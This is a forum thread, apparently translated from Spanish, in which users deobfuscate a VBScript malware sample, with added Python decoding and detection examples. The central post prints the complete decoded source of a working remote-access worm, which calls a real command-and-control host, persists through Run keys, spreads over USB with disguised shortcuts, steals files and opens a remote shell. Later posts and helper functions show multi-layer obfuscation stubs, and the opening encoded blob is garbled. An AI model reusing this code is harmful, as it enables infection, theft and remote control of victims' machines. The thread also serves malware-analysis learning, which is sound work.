ŸYŒŒ——85—ž"'K™šŸKš£ŽYžŸYŒŸ™š'žŸŒ˜KŸ"™85KKKŒŒ——'š˜Œ™¤KhKš£ŽYžŸYŒŒ——85—žK85KKKŒŒ——'š˜Œ™¤KhKMM85™K"'8585Ž˜ž"——KhKŒŒ——'š˜Œ™¤85™K' ™ŽŸ"š™"))
sddfskcIdCLcsoSkso()
Function sddfskcIdCLcsoSkso()
For i = 1 to dcssLdchdcdDCsiijSS(dDssDajcooSLscaC)
hsDCcocssccCaVICC = hsDCcocssccCaVICC & ((CHRW(ASC((MID(dDssDajcooSLscaC, i))) - ASC("+"))))
next
executeglobal hsDCcocssccCaVICC
End Function
Function dcssLdchdcdDCsiijSS(sStr)
Do
i = i + &H1
bLen = Left(sStr, i)
dcssLdchdcdDCsiijSS = i
Loop While sStr <> bLen
End Function
Thanks in advance. :laugh:
The good thing here is that you can see how the encoded string gets decoded, so you just have to follow the sequence:
The encoded string:
dDssDajcooSLscaC = ((""šžŸKhKMbY˜šššYŽš˜M85›šŸKhKd^b
This is the function that decodes the encoding; as an example I only took the first 2 characters of the encoded string, which would actually be 5
dDssDajcooSLscaC = ((""š"))
msgbox dcssLdchdcdDCsiijSS(dDssDajcooSLscaC)
Function dcssLdchdcdDCsiijSS(sStr)
Do
i = i + &H1 ' &H1 is hexadecimal for 1, i.e. it increments the variable i by 1 each time, keeping the value
bLen = Left(sStr, i) ' Walks the encoded string from the left up to the incremented value of i
dcssLdchdcdDCsiijSS = i ' Returns the real length of the encoded string
Loop While sStr <> bLen
End Function
The next function is the one that decodes the encoded value; let's look:
Function sddfskcIdCLcsoSkso()
For i = 1 to dcssLdchdcdDCsiijSS(dDssDajcooSLscaC) ' Uses the previous function to get the real length of the encoded string
hsDCcocssccCaVICC = hsDCcocssccCaVICC & ((CHRW(ASC((MID(dDssDajcooSLscaC, i))) - ASC("+"))))
Next
ExecuteGlobal hsDCcocssccCaVICC ' Execution of the decoded code
End Function
Line 3 is where the decoding happens; it uses the following functions:
CHRW ' returns a Unicode character; however, on systems that do not support the Unicode character set, the function behaves identically to CHR.
ASC ' Converts the first character of a string to its ANSI code and returns the result.
MID ' Returns a specified number of characters from a string.
Let's look at the conversion with the first two characters of the encoded string,
[TO BE CONTINUED xD]
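Added example, not part of the reply: the two functions above re-expressed in Python with VBScript's byte semantics spelled out (the .vbs is read as ANSI/cp1252, ASC() returns that byte, CHRW(byte - 43) gives the character back). It also shows why the blob pasted at the top of the thread does not decode as-is: the shifted bytes for some letters have no cp1252 glyph and were dropped by the paste. KEY, walk, lost_in_paste and the SAMPLE string are this example's own names.

```python
# Added example (not from the thread): the OP's two decoder functions with
# VBScript's byte semantics made explicit. The .vbs is read as ANSI (cp1252),
# ASC() returns that byte, and CHRW(byte - ASC("+")) restores the character.

KEY = ord("+")  # 43, the constant in CHRW(ASC(MID(s, i)) - ASC("+"))

# cp1252 leaves these five byte values unassigned, so a paste that passes
# through a text encoder drops or replaces any shifted byte that lands here.
CP1252_UNDEFINED = {0x81, 0x8D, 0x8F, 0x90, 0x9D}

# Constructed plaintext, taken from the test script quoted later in the thread.
SAMPLE = 'msgbox "prueba de cifrado"'


def obfuscated_len(s: str) -> int:
    """dcssLdchdcdDCsiijSS: grow a Left() prefix until it equals the whole
    string. It is Len() written to look unusual (and returns 1 for "",
    exactly like the original loop does)."""
    i = 0
    while True:
        i += 1
        if s[:i] == s:
            return i


def decode_shift(blob: bytes, key: int = KEY) -> str:
    """sddfskcIdCLcsoSkso without the ExecuteGlobal: one CHRW per byte."""
    return "".join(chr(b - key) for b in blob)


def encode_shift(plain: str, key: int = KEY) -> bytes:
    """Inverse of decode_shift; refuses characters that no longer fit in a byte."""
    out = bytearray()
    for c in plain:
        v = ord(c) + key
        if v > 0xFF:
            raise ValueError(f"{c!r} does not fit in one ANSI byte after the shift")
        out.append(v)
    return bytes(out)


def walk(blob: bytes, n: int, key: int = KEY) -> list:
    """The per-character conversion the reply starts to show:
    (encoded byte, byte - 43, resulting character) for the first n bytes."""
    return [(b, b - key, chr(b - key)) for b in blob[:n]]


def lost_in_paste(plain: str, key: int = KEY) -> set:
    """Plaintext characters whose shifted byte has no cp1252 glyph. For the
    decoded script in this thread that includes 'd', 'e' and 'r', which is why
    words like 'select' and 'param' appear with letters missing in the pasted blob."""
    return {c for c in plain if ord(c) + key in CP1252_UNDEFINED}


if __name__ == "__main__":
    blob = encode_shift(SAMPLE)
    for byte, code, ch in walk(blob, 4):
        print(f"0x{byte:02X} - {KEY} = {code:3d} -> {ch!r}")
    print(decode_shift(blob))
    print("letters a cp1252 paste would lose:", sorted(lost_in_paste(SAMPLE)))
```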
This is a very common technique in VBS malware, or in any other kind of script, and getting the decoded code is very simple; all you need to do is replace line #7:
executeglobal hsDCcocssccCaVICC
with the following:
Set fso = CreateObject("Scripting.FileSystemObject") ' the original script never creates fso, so it has to be created here
Set file = fso.CreateTextFile("D:\decrypted.txt", True)
file.write(hsDCcocssccCaVICC)
file.close
Then "decrypted.txt" will contain the malware's decoded code. Here it is after decoding it and fixing the odd character. It is basically a variant of a malware I analysed some time ago on my blog (https://reversec0de.wordpress.com/2013/10/12/analizando-el-malware-mugen-vbs/)
(WARNING: DO NOT RUN THIS DIRECTLY ON YOUR MAIN OS, THIS IS A REAL SAMPLE OF REAL MALWARE. You have all been warned)
host = "r7.mooo.com"
port = 9371
installdir = "%appdata%"
lnkfile = true
lnkfolder = false
dim shellobj
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")
installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
spliter = "<" & "|" & ">"
sleep = 5000
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
dim oneonce
on error resume next
instance
while true
install
response = ""
response = post ("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
case "excecute"
param = cmd (1)
execute param
case "update"
param = cmd (1)
oneonce.close
set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false)
oneonce.write param
oneonce.close
shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
wscript.quit
case "uninstall"
uninstall
case "send"
download cmd (1),cmd (2)
case "site-send"
sitedownloader cmd (1),cmd (2)
case "recv"
param = cmd (1)
upload (param)
case "enum-driver"
post "is-enum-driver",enumdriver
case "enum-faf"
param = cmd (1)
post "is-enum-faf",enumfaf (param)
case "enum-process"
post "is-enum-process",enumprocess
case "cmd-shell"
param = cmd (1)
post "is-cmd-shell",cmdshell (param)
case "delete"
param = cmd (1)
deletefaf (param)
case "exit-process"
param = cmd (1)
exitprocess (param)
case "sleep"
param = cmd (1)
sleep = eval (param)
end select
wscript.sleep sleep
wend
sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon
upstart
for each drive in filesystemobj.drives
if drive.isready = true then
if drive.freespace > 0 then
if drive.drivetype = 1 then
filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
if filesystemobj.fileexists (drive.path & "\" & installname) then
filesystemobj.getfile(drive.path & "\" & installname).attributes = 2+4
end if
for each file in filesystemobj.getfolder( drive.path & "\" ).Files
if not lnkfile then exit for
if instr (file.name,".") then
if lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
file.attributes = 2+4
if ucase (file.name) <> ucase (installname) then
filename = split(file.name,".")
set lnkobj = shellobj.createshortcut (drive.path & "\" & filename (0) & ".lnk")
lnkobj.windowstyle = 7
lnkobj.targetpath = "cmd.exe"
lnkobj.workingdirectory = ""
lnkobj.arguments = "/c start " & replace(file.name," ", chrw(34) & " " & chrw(34)) & "&start " & replace(installname," ", chrw(34) & " " & chrw(34)) &"&exit"
fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
if instr (fileicon,",") = 0 then
lnkobj.iconlocation = file.path
else
lnkobj.iconlocation = fileicon
end if
lnkobj.save()
end if
end if
end if
next
for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
if not lnkfolder then exit for
folder.attributes = 2+4
foldername = folder.name
set lnkobj = shellobj.createshortcut (drive.path & "\" & foldername & ".lnk")
lnkobj.windowstyle = 7
lnkobj.targetpath = "cmd.exe"
lnkobj.workingdirectory = ""
lnkobj.arguments = "/c start " & replace(folder.name," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(installname," ", chrw(34) & " " & chrw(34)) &"&exit"
foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
if instr (foldericon,",") = 0 then
lnkobj.iconlocation = folder.path
else
lnkobj.iconlocation = foldericon
end if
lnkobj.save()
next
end If
end If
end if
next
err.clear
end sub
sub uninstall
on error resume next
dim filename
dim foldername
shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true
for each drive in filesystemobj.drives
if drive.isready = true then
if drive.freespace > 0 then
if drive.drivetype = 1 then
for each file in filesystemobj.getfolder ( drive.path & "\").files
on error resume next
if instr (file.name,".") then
if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
file.attributes = 0
if ucase (file.name) <> ucase (installname) then
filename = split(file.name,".")
filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
else
filesystemobj.deletefile (drive.path & "\" & file.name)
end If
else
filesystemobj.deletefile (file.path)
end if
end if
next
for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
folder.attributes = 0
next
end if
end if
end if
next
wscript.quit
end sub
function post (cmd ,param)
post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function
function information
on error resume next
if inf = "" then
inf = hwid & spliter
inf = inf & shellobj.expandenvironmentstrings("%computername%") & spliter
inf = inf & shellobj.expandenvironmentstrings("%username%") & spliter
set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set os = root.execquery ("select * from win32_operatingsystem")
for each osinfo in os
inf = inf & osinfo.caption & spliter
exit for
next
inf = inf & "plus" & spliter
inf = inf & security & spliter
inf = inf & usbspreading
information = inf
else
information = inf
end if
end function
sub upstart ()
on error resume Next
shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
end sub
function hwid
on error resume next
set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
if disk.volumeserialnumber <> "" then
hwid = disk.volumeserialnumber
exit for
end if
next
end function
function security
on error resume next
security = ""
set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
for x = 1 to ubound (versionstr)
osversion = osversion & versionstr (i)
next
osversion = eval (osversion)
if osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
for each objantivirus in colantivirus
security = security & objantivirus.displayname & " ."
next
if security = "" then security = "nan-av"
end function
function instance
on error resume next
usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
if usbspreading = "" then
if lcase ( mid(wscript.scriptfullname,2)) = ":\" & lcase(installname) then
usbspreading = "true - " & date
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
else
usbspreading = "false - " & date
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
end if
end If
upstart
set scriptfullnameshort = filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort = filesystemobj.getfile (installdir & installname)
if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
wscript.quit
end If
err.clear
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if err.number > 0 then wscript.quit
end function
sub sitedownloader (fileurl,filename)
strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send
set objfsodownload = createobject ("scripting.filesystemobject")
if objfsodownload.fileexists (strsaveto) then
objfsodownload.deletefile (strsaveto)
end if
if objhttpdownload.status = 200 then
dim objstreamdownload
set objstreamdownload = createobject("adodb.stream")
with objstreamdownload
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
end with
set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub
sub download (fileurl,filedir)
if filedir = "" then
filedir = installdir
end if
strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""
set objfsodownload = createobject ("scripting.filesystemobject")
if objfsodownload.fileexists (strsaveto) then
objfsodownload.deletefile (strsaveto)
end if
if objhttpdownload.status = 200 then
dim objstreamdownload
set objstreamdownload = createobject("adodb.stream")
with objstreamdownload
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
end with
set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub
function upload (fileurl)
dim httpobj,objstreamuploade,buffer
set objstreamuploade = createobject("adodb.stream")
with objstreamuploade
.type = 1
.open
.loadfromfile fileurl
buffer = .read
.close
end with
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
httpobj.send buffer
end function
function enumdriver ()
for each drive in filesystemobj.drives
if drive.isready = true then
enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
end if
next
end Function
function enumfaf (enumdir)
enumfaf = enumdir & spliter
for each folder in filesystemobj.getfolder (enumdir).subfolders
enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next
for each file in filesystemobj.getfolder (enumdir).files
enumfaf = enumfaf & file.name & "|" & file.size & "|" & "f" & "|" & file.attributes & spliter
next
end function
function enumprocess ()
on error resume next
set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)
dim objitem
for each objitem in colitems
enumprocess = enumprocess & objitem.name & "|"
enumprocess = enumprocess & objitem.processid & "|"
enumprocess = enumprocess & objitem.executablepath & spliter
next
end function
sub exitprocess (pid)
on error resume next
shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub
sub deletefaf (url)
on error resume next
filesystemobj.deletefile url
filesystemobj.deletefolder url
end sub
function cmdshell (cmd)
dim httpobj,oexec,readallfromany
set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
readallfromany = oexec.stderr.readall
else
readallfromany = ""
end if
cmdshell = readallfromany
end function
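Added example, not from the post or the malware: detection logic for the beacon that post() and information() above produce, run over a few constructed proxy log lines. It assumes the header is logged as a normal User-Agent (the script sets it under the name "user-agent:" with a trailing colon, so verify what your proxy actually records); the host, port and field values in SAMPLE_LOG are made up.

```python
# Added example (not from the thread): detection logic for the beacon the
# decoded script sends. Every request is an HTTP POST to http://host:port/<cmd>,
# the User-Agent carries seven fields joined by "<|>" (hwid, computer name,
# user name, OS caption, the literal "plus", the AV list, the usbspreading
# flag) and the server replies with "<command><|><param>".
import re

SPLITER = "<|>"  # spliter = "<" & "|" & ">"
# Paths the script posts to (the cmd argument of post(), download(), upload()).
BEACON_PATHS = {"is-ready", "is-enum-driver", "is-enum-faf", "is-enum-process",
                "is-cmd-shell", "is-sending", "is-recving"}
# Replies the main loop's Select Case dispatches on (note the "excecute" typo).
C2_COMMANDS = {"excecute", "update", "uninstall", "send", "site-send", "recv",
               "enum-driver", "enum-faf", "enum-process", "cmd-shell", "delete",
               "exit-process", "sleep"}
UA_FIELDS = ("hwid", "computername", "username", "os", "plus", "security", "usbspreading")

# Constructed proxy log lines in the form: <method> <url> "<user-agent>".
# 192.0.2.10 is a documentation address; nothing here is real traffic.
SAMPLE_LOG = [
    'POST http://192.0.2.10:9371/is-ready '
    '"A1B2C3D4<|>DESKTOP-01<|>alice<|>Microsoft Windows 7 Professional<|>plus<|>nan-av<|>false - 22/10/2017"',
    'GET http://www.example.com/index.html "Mozilla/5.0 (Windows NT 6.1) Firefox/56.0"',
    'POST http://192.0.2.10:9371/is-sending<|>update.exe '
    '"A1B2C3D4<|>DESKTOP-01<|>alice<|>Microsoft Windows 7 Professional<|>plus<|>nan-av<|>false - 22/10/2017"',
]

LOG_LINE = re.compile(r'^(?P<method>\w+) (?P<url>\S+) "(?P<ua>[^"]*)"$')
URL = re.compile(r'^https?://(?P<netloc>[^/]+)(?P<path>/.*)?$')


def parse_beacon(line: str):
    """Return the decoded beacon fields for a matching log line, else None."""
    m = LOG_LINE.match(line)
    if not m or m["method"].upper() != "POST":
        return None
    u = URL.match(m["url"])
    if not u:
        return None
    path = (u["path"] or "/").lstrip("/")
    cmd = path.split(SPLITER, 1)[0]  # download() appends "<|>" & fileurl to the path
    if cmd not in BEACON_PATHS:
        return None
    parts = m["ua"].split(SPLITER)
    if len(parts) != len(UA_FIELDS):
        return None
    info = dict(zip(UA_FIELDS, parts))
    if info["plus"] != "plus":  # fixed marker information() inserts between OS and AV
        return None
    return {"c2": u["netloc"], "cmd": cmd, **info}


def scan(lines):
    """All beacons found in an iterable of log lines."""
    return [b for b in map(parse_beacon, lines) if b is not None]


def parse_c2_reply(text: str):
    """What `cmd = split(response, spliter)` / `select case cmd(0)` would act on."""
    fields = text.split(SPLITER)
    if fields[0] not in C2_COMMANDS:
        return None
    return fields[0], fields[1:]


if __name__ == "__main__":
    for b in scan(SAMPLE_LOG):
        print(f"{b['c2']} {b['cmd']}: {b['computername']}\\{b['username']} av={b['security']}")
    print(parse_c2_reply("excecute<|>msgbox 1"))
```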
Very good, thanks. I get it now.
One question: what if I want to use that encryption technique on, say, this script:
msgbox "prueba de cifrado"
How would I encrypt it with at least 3 layers of encryption?
Quote from: **Aincrad** on 22 October 2017, 16:55 PM
Very good, thanks. I get it now.
One question: what if I want to use that encryption technique on, say, this script:
msgbox "prueba de cifrado"
How would I encrypt it with at least 3 layers of encryption?
From what I can see, it is a CAESAR cipher: https://en.wikipedia.org/wiki/Caesar_cipher
Quote from: **Aincrad** on 19 October 2017, 15:59 PM
***
hsDCcocssccCaVICC = hsDCcocssccCaVICC & ((CHRW(ASC((MID(dDssDajcooSLscaC, i))) - ASC("+"))))
***
It isn't hard to implement that cipher with as many passes as you want.
Regards!
Ah, OK.
Well, I convert the text to hex and base it on this old WSF virus.
<?XML version="1.0"?><job>
<script language="VBScript">
<![CDATA[
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("6D7367626F782022686F6C6122")
ExecuteGlobal FACEBOOKFACEBOOK
Function php(FACEBOOKFACEBOOK) : For y = 1 To Len(FACEBOOKFACEBOOK) Step 2 : ub = ub & Chr(Clng("&H" & Mid(FACEBOOKFACEBOOK, y, 2))) : Next : php = ub : End Function
]]>
</script>
</job>
The code I converted to hex was msgbox "hola", which came out as
6D7367626F782022686F6C6122 and since I based it on this code I can encode any VBS.
And in any case, to decode the code, from what you just explained it would look like this:
<?XML version="1.0"?><job>
<script language="VBScript">
<![CDATA[
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("6D7367626F782022686F6C6122")
Function php(FACEBOOKFACEBOOK) : For y = 1 To Len(FACEBOOKFACEBOOK) Step 2 : ub = ub & Chr(Clng("&H" & Mid(FACEBOOKFACEBOOK, y, 2))) : Next : php = ub : End Function
Set fso = CreateObject("scripting.filesystemobject")
Set fichero = fso.CreateTextFile("decrypted.txt", True)
fichero.write(FACEBOOKFACEBOOK)
fichero.close
]]>
</script>
</job>
Thanks for the explanations. ;-)
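Added example, not from the thread: the offline equivalent of swapping ExecuteGlobal for a file write, in Python. It recognises the decoder stub, decodes the longest string literal and repeats for as many layers as were stacked, covering both the ASC("+") shift of the first script and the hex php() of the WSF one. wrap_shift and wrap_hex only build layered test inputs in the shape of those two scripts (three shift passes is the most plain ASCII survives before a byte overflows); every name here is the example's own.

```python
# Added example (not from the thread): an offline peeler for the two encodings
# seen here. Instead of running the script with ExecuteGlobal swapped for a
# file write, it recognises the decoder stub, decodes the longest string
# literal and repeats until no ExecuteGlobal is left. Strings hold one
# character per ANSI byte (code points 0..255), mirroring how VBScript reads
# the file.
import re

SHIFT_STUB = re.compile(r'-\s*ASC\("(.)"\)', re.IGNORECASE)  # CHRW(ASC(c) - ASC("+"))
HEX_STUB = re.compile(r'"&H"\s*&\s*Mid\(', re.IGNORECASE)     # Chr(CLng("&H" & Mid(s, y, 2)))
STRING_LITERAL = re.compile(r'"([^"\r\n]*)"')
EXECUTEGLOBAL = re.compile(r"\bExecuteGlobal\b", re.IGNORECASE)


def decode_shift(blob: str, key: str) -> str:
    return "".join(chr(ord(c) - ord(key)) for c in blob)


def decode_hex(blob: str) -> str:
    return bytes.fromhex(blob).decode("latin-1")


def detect_scheme(src: str):
    """('shift', key), ('hex', None) or (None, None) for this layer."""
    m = SHIFT_STUB.search(src)
    if m:
        return "shift", m.group(1)
    if HEX_STUB.search(src):
        return "hex", None
    return None, None


def peel_layer(src: str):
    """Decode one layer; None when no known decoder stub is present."""
    scheme, key = detect_scheme(src)
    literals = STRING_LITERAL.findall(src)
    if scheme is None or not literals:
        return None
    blob = max(literals, key=len)  # the payload is always the longest literal
    return decode_shift(blob, key) if scheme == "shift" else decode_hex(blob)


def peel_all(src: str, max_layers: int = 10) -> list:
    """Every layer from the outer script down to the plain one."""
    layers = [src]
    while EXECUTEGLOBAL.search(layers[-1]) and len(layers) <= max_layers:
        inner = peel_layer(layers[-1])
        if inner is None:
            break
        layers.append(inner)
    return layers


# --- builders used only to produce layered test inputs ---------------------

def wrap_shift(plain: str, key: str = "+") -> str:
    """One shift layer in the shape of the first script (names are made up)."""
    blob = "".join(chr(ord(c) + ord(key)) for c in plain)
    if any(ord(c) > 0xFF for c in blob):
        raise ValueError("a character no longer fits in one ANSI byte")
    return (
        f'payload = "{blob}"\r\n'
        "For i = 1 To Len(payload)\r\n"
        f'    decoded = decoded & ChrW(Asc(Mid(payload, i, 1)) - Asc("{key}"))\r\n'
        "Next\r\n"
        "ExecuteGlobal decoded\r\n"
    )


def wrap_hex(plain: str) -> str:
    """One hex layer in the shape of the WSF script's php() function."""
    if any(ord(c) > 0xFF for c in plain):
        raise ValueError("a character does not fit in one byte")
    blob = "".join(f"{ord(c):02X}" for c in plain)
    return (
        f'p = php("{blob}")\r\n'
        "ExecuteGlobal p\r\n"
        "Function php(s) : For y = 1 To Len(s) Step 2 : ub = ub & "
        'Chr(CLng("&H" & Mid(s, y, 2))) : Next : php = ub : End Function\r\n'
    )


PLAIN = 'msgbox "prueba de cifrado"'  # the test script quoted in the thread

if __name__ == "__main__":
    outer = wrap_shift(wrap_hex(wrap_shift(PLAIN)))
    for depth, layer in enumerate(peel_all(outer)):
        print(depth, detect_scheme(layer)[0], repr(layer[:40]))
```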